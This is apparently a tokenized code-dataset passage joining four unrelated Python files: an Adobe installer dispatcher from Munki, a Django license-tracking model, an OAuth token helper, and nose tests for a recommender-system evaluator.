, operation = "<STR_LIT>" ) <EOL> if retcode : <EOL> munkicommon . display_error ( "<STR_LIT>" , item [ '<STR_LIT:name>' ] ) <EOL> return retcode <EOL> def doAdobeInstall ( item ) : <EOL> '''<STR_LIT>''' <EOL> managedinstallbase = munkicommon . pref ( '<STR_LIT>' ) <EOL> itempath = os . path . join ( <EOL> managedinstallbase , '<STR_LIT>' , item [ '<STR_LIT>' ] ) <EOL> installer_type = item . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> payloads = item . get ( "<STR_LIT>" ) <EOL> if installer_type == "<STR_LIT>" : <EOL> retcode = runAdobeSetup ( itempath , payloads = payloads ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> pkgname = item . get ( "<STR_LIT>" ) or item . 
get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> retcode = runAdobeUberTool ( itempath , pkgname , payloads = payloads ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> retcode = updateAcrobatPro ( itempath ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> retcode = runAdobeCS5AAMEEInstall ( itempath , payloads = payloads ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> retcode = runAdobeCS5PatchInstaller ( <EOL> itempath , copylocal = item . get ( "<STR_LIT>" ) , payloads = payloads ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> retcode = runAdobeCCPpkgScript ( itempath , payloads = payloads ) <EOL> return retcode <EOL> def main ( ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from django . db import models <EOL> from inventory . models import InventoryItem <EOL> from urllib import quote_plus <EOL> class License ( models . Model ) : <EOL> item_name = models . CharField ( max_length = <NUM_LIT:64> , unique = True , primary_key = True ) <EOL> total = models . IntegerField ( default = <NUM_LIT:0> ) <EOL> cost_per_seat = models . IntegerField ( default = <NUM_LIT:0> ) <EOL> inventory_name = models . CharField ( max_length = <NUM_LIT> , blank = True ) <EOL> inventory_version = models . CharField ( max_length = <NUM_LIT:32> , blank = True ) <EOL> inventory_bundleid = models . CharField ( max_length = <NUM_LIT> , blank = True ) <EOL> inventory_bundlename = models . CharField ( max_length = <NUM_LIT> , blank = True ) <EOL> inventory_path = models . CharField ( max_length = <NUM_LIT> , blank = True ) <EOL> notes = models . TextField ( blank = True ) <EOL> def used ( self ) : <EOL> items = InventoryItem . objects . all ( ) <EOL> if self . inventory_name : <EOL> items = items . filter ( name__exact = self . inventory_name ) <EOL> if self . inventory_version : <EOL> if self . inventory_version . endswith ( '<STR_LIT:*>' ) : <EOL> items = items . filter ( <EOL> version__startswith = self . inventory_version [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) <EOL> else : <EOL> items = items . filter ( version__exact = self . inventory_version ) <EOL> if self . inventory_bundleid : <EOL> items = items . filter ( bundleid__exact = self . inventory_bundleid ) <EOL> if self . inventory_bundlename : <EOL> items = items . filter ( <EOL> bundlename__exact = self . inventory_bundlename ) <EOL> if self . inventory_path : <EOL> items = items . filter ( path__exact = self . inventory_path ) <EOL> return items . values ( '<STR_LIT>' ) . distinct ( ) . count ( ) <EOL> def inventory_query_string ( self ) : <EOL> '''<STR_LIT>''' <EOL> parts = [ ] <EOL> if self . inventory_name : <EOL> parts . append ( "<STR_LIT>" % self . inventory_name ) <EOL> if self . 
inventory_version : <EOL> parts . append ( "<STR_LIT>" % self . inventory_version ) <EOL> if self . inventory_bundleid : <EOL> parts . append ( "<STR_LIT>" % self . inventory_bundleid ) <EOL> if self . inventory_bundlename : <EOL> parts . append ( "<STR_LIT>" % self . inventory_bundlename ) <EOL> if self . inventory_path : <EOL> parts . append ( "<STR_LIT>" % self . inventory_path ) <EOL> if parts : <EOL> return quote_plus ( '<STR_LIT>' % '<STR_LIT:&>' . join ( parts ) , safe = '<STR_LIT>' ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def available ( self ) : <EOL> return self . total - self . used ( ) <EOL> class Meta : <EOL> ordering = [ '<STR_LIT>' ] </s>
<s> import oauth_local <EOL> import oauth_installed <EOL> import oauth_gce <EOL> import sys <EOL> import datetime <EOL> import http <EOL> import json <EOL> import oauth_base <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def resolve ( t ) : <EOL> if t == '<STR_LIT>' : <EOL> return oauth_installed <EOL> elif t == '<STR_LIT>' : <EOL> return oauth_local <EOL> elif t == '<STR_LIT>' : <EOL> return oauth_gce <EOL> raise Error ( '<STR_LIT>' % ( t ) ) <EOL> def get_token ( ) : <EOL> auth = oauth_base . read_file ( ) <EOL> if not auth : <EOL> raise Error ( '<STR_LIT>' ) <EOL> now = int ( datetime . datetime . now ( ) . strftime ( "<STR_LIT:%s>" ) ) <EOL> handler = resolve ( auth [ '<STR_LIT>' ] ) <EOL> if now > auth [ '<STR_LIT>' ] - <NUM_LIT> : <EOL> handler . refresh_token ( auth ) <EOL> auth = oauth_base . read_file ( ) <EOL> if not auth : <EOL> raise Error ( '<STR_LIT>' ) <EOL> return auth [ '<STR_LIT>' ] <EOL> def oauth_req_json ( method , url , params = None , headers = { } , expects = [ <NUM_LIT:200> ] ) : <EOL> return oauth_async_req_json ( method , url , params , headers , expects ) . resp ( ) <EOL> def oauth_async_req_json ( method , url , params = None , headers = { } , expects = [ <NUM_LIT:200> ] ) : <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' % get_token ( ) <EOL> if params : <EOL> params = json . dumps ( params ) <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return http . async_req_json ( method , url , params , headers , expects ) <EOL> def argparse_prepare ( sub ) : <EOL> """<STR_LIT>""" <EOL> def argparse_exec ( args ) : <EOL> print get_token ( ) <EOL> def __main ( ) : <EOL> print get_token ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> __main ( ) </s>
<s> from nose . tools import assert_equals , assert_almost_equals , assert_raises , assert_true <EOL> from ... similarities . basic_similarities import UserSimilarity <EOL> from ... metrics . pairwise import euclidean_distances , jaccard_coefficient <EOL> from ... models . classes import MatrixPreferenceDataModel , MatrixBooleanPrefDataModel <EOL> from ... recommenders . knn import UserBasedRecommender <EOL> from . . classes import CfEvaluator <EOL> from ... recommenders . knn . neighborhood_strategies import NearestNeighborsStrategy <EOL> movies = { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1.0> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { } } <EOL> model = MatrixPreferenceDataModel ( movies ) <EOL> boolean_model = MatrixBooleanPrefDataModel ( movies ) <EOL> similarity = UserSimilarity ( model , euclidean_distances ) <EOL> boolean_similarity = UserSimilarity ( boolean_model , jaccard_coefficient ) <EOL> 
neighborhood = NearestNeighborsStrategy ( ) <EOL> recsys = UserBasedRecommender ( model , similarity , neighborhood ) <EOL> boolean_recsys = UserBasedRecommender ( boolean_model , boolean_similarity , neighborhood ) <EOL> def test_root_CfEvaluator_evaluate ( ) : <EOL> """<STR_LIT>""" <EOL> evaluator = CfEvaluator ( ) <EOL> assert_raises ( ValueError , evaluator . evaluate , recsys , '<STR_LIT>' ) <EOL> rmse = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( rmse [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and rmse [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> mae = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( mae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and mae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( nmae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and nmae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> precision = evaluator . evaluate ( recsys , '<STR_LIT>' , <EOL> permutation = False ) <EOL> assert_true ( precision [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and precision [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> recall = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( recall [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and recall [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> f1score = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( f1score [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and f1score [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> all_scores = evaluator . 
evaluate ( recsys , permutation = False ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False , <EOL> sampling_users = <NUM_LIT> , sampling_ratings = <NUM_LIT> ) <EOL> assert_true ( nmae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and nmae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_raises ( ValueError , evaluator . evaluate , boolean_recsys , '<STR_LIT>' ) <EOL> rmse = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( rmse [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and rmse [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> mae = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( mae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and mae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( nmae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and nmae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> precision = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , <EOL> permutation = False ) <EOL> assert_true ( precision [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and precision [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> recall = evaluator . 
evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( recall [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and recall [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> f1score = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( f1score [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and f1score [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> all_scores = evaluator . evaluate ( recsys , permutation = False ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False , <EOL> sampling_users = <NUM_LIT> , sampling_ratings = <NUM_LIT> ) <EOL> assert_true ( nmae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and nmae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> def test_root_CfEvaluator_evaluate_on_split ( ) : <EOL> """<STR_LIT>""" <EOL> evaluator = CfEvaluator ( ) <EOL> assert_raises ( ValueError , evaluator . evaluate_on_split , recsys , '<STR_LIT>' ) <EOL> rmse = evaluator . 
evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in rmse [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( rmse [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> rmse [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> mae = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in mae [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( mae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> mae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in nmae [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( nmae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> nmae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> precision = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in precision [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( precision [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> precision [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> recall = evaluator . 
evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in recall [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( recall [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> recall [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> f1score = evaluator . evaluate_on_split ( recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in f1score [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( f1score [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> f1score [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> all_scores = evaluator . evaluate_on_split ( recsys , permutation = False ) <EOL> for p in all_scores [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> for p in all_scores [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and 
<EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_raises ( ValueError , evaluator . evaluate_on_split , boolean_recsys , '<STR_LIT>' ) <EOL> rmse = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in rmse [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( rmse [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> rmse [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> mae = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in mae [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( mae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> mae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . 
evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in nmae [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( nmae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> nmae [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> precision = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in precision [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( precision [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> precision [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> recall = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in recall [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( recall [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> recall [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> f1score = evaluator . evaluate_on_split ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> for p in f1score [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( f1score [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> f1score [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> all_scores = evaluator . 
evaluate_on_split ( boolean_recsys , permutation = False ) <EOL> for p in all_scores [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> for p in all_scores [ <NUM_LIT:0> ] [ '<STR_LIT:error>' ] : <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( p [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and p [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and <EOL> all_scores [ <NUM_LIT:1> ] [ 
'<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) </s>
